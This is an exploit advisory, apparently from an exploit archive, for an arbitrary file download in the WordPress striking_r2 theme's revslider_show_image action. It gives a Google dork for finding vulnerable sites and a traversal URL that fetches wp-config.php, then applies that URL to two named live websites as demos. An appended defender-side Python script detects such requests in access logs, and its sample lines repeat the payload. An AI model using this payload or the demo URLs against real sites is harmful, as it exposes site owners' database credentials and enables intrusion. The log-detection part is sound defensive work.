
WordPress striking_r2 theme Arbitrary File Download Vulnerability

Author: KkK1337 , Published: 15-09-2014
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# Title : WordPress striking_r2 theme Arbitrary File Download Vulnerability

# Author : KkK1337

# Risk : Low

# Class: Remote

# Google Dork: inurl:/wp-content/themes/striking_r2

# Date: 10/09/2014

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

You can download any file from your target.

Exploit:
http://www.[target].com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Demo:

1. Download wp-config.php file from site:

http://www.kitcuisinemoleculaire.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://www.argeacupuntura.es/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
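As an added defender-side example that is not part of the original advisory: a Python script that scans web-server access logs (Apache/nginx combined format) for requests to admin-ajax.php with the revslider_show_image action and a traversal value in the img parameter. The log lines are constructed samples, and the double-decoding step is an assumption to catch double-encoded variants.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined format); not from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Sep/2014:10:01:12 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Sep/2014:10:01:20 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2F..%2Fwp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Sep/2014:10:02:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slider1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Sep/2014:10:02:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 44 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request URL and status code from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(img):
    """True when the img value would escape the intended image directory.

    Decode twice so double-encoded dots are not missed, treat backslashes as
    separators, normalise the path, then flag anything that still climbs above
    the base directory or is absolute."""
    decoded = unquote(unquote(img))
    normalised = posixpath.normpath(decoded.replace("\\", "/"))
    return normalised == ".." or normalised.startswith("../") or normalised.startswith("/")


def find_revslider_traversal(log_text):
    """Return (ip, timestamp, img, status) for each suspicious revslider_show_image request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query)  # parse_qs percent-decodes values once
        if qs.get("action", [""])[0] != "revslider_show_image":
            continue
        for img in qs.get("img", []):
            if is_traversal(img):
                findings.append((m.group("ip"), m.group("ts"), img, int(m.group("status"))))
    return findings


if __name__ == "__main__":
    for ip, ts, img, status in find_revslider_traversal(SAMPLE_LOG):
        print(f"{ts} {ip} status={status} img={img}")
```

A status of 200 on a flagged line means the server served the requested file, which is the case to escalate first.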
